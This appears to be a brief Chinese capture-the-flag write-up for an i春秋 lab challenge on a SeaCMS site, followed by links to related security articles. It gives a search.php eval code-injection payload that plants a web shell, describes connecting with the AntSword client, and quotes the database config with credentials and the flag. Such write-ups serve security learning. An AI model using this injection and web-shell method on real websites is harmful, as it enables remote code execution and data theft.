i春秋-Test

题目


解题

参考WP

https://blog.csdn.net/qq_40654505/article/details/107142533/

目录扫描

复现wp

payload为:

search.php?searchtype=5&tid=&area=eval($_POST[cmd])

使用蚁剑连接

http://eci-2ze4iyhwj7xvb68bsb2t.cloudeci1.ichunqiu.com:80/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

cmd

找到数据库配置文件,/var/www/html/data/common.inc.php

<?php
//数据库连接信息
$cfg_dbhost = '127.0.0.1';
$cfg_dbname = 'seacms';
$cfg_dbuser = 'sea_user';
$cfg_dbpwd = '46e06533407e';
$cfg_dbprefix = 'sea_';
$cfg_db_language = 'utf8';
?>

鼠标右击这条shell,选择数据操作,添加上面的数据库用户名和密码连接数据库


flag{d2317097-0b48-4bbc-a968-90ec76ac67ea}
相关推荐
炫彩@之星2 小时前
经验分享—WEB渗透测试中遇到加密内容的数据包该如何测试!
安全·web安全·数据包加密解密·web js逆向
Hacker_Fuchen4 小时前
ctf网络安全题库 ctf网络安全大赛答案
安全·web安全
H轨迹H6 小时前
BUUCTF-Web方向21-25wp
网络安全·渗透测试·ctf
网安Ruler8 小时前
靶场之路-Kioptix Level-1 mod_ssl 缓冲区溢出漏洞
网络·网络协议·网络安全·ssl
Hacker_Nightrain10 小时前
内网网络安全的解决之道
安全·web安全·php
Dawndddddd11 小时前
网络安全之攻防笔记--通用安全漏洞SQL注入&sqlmap&Oracle&mongodb&DB2
笔记·sql·安全·web安全
Werqy312 小时前
burpsuite保姆级安装教程
网络安全
竹言笙熙1 天前
代码审计初探
学习·web安全
网络安全King1 天前
华为 网络安全 认证
安全·web安全
网络安全-老纪1 天前
网络安全-js安全知识点与XSS常用payloads
javascript·安全·web安全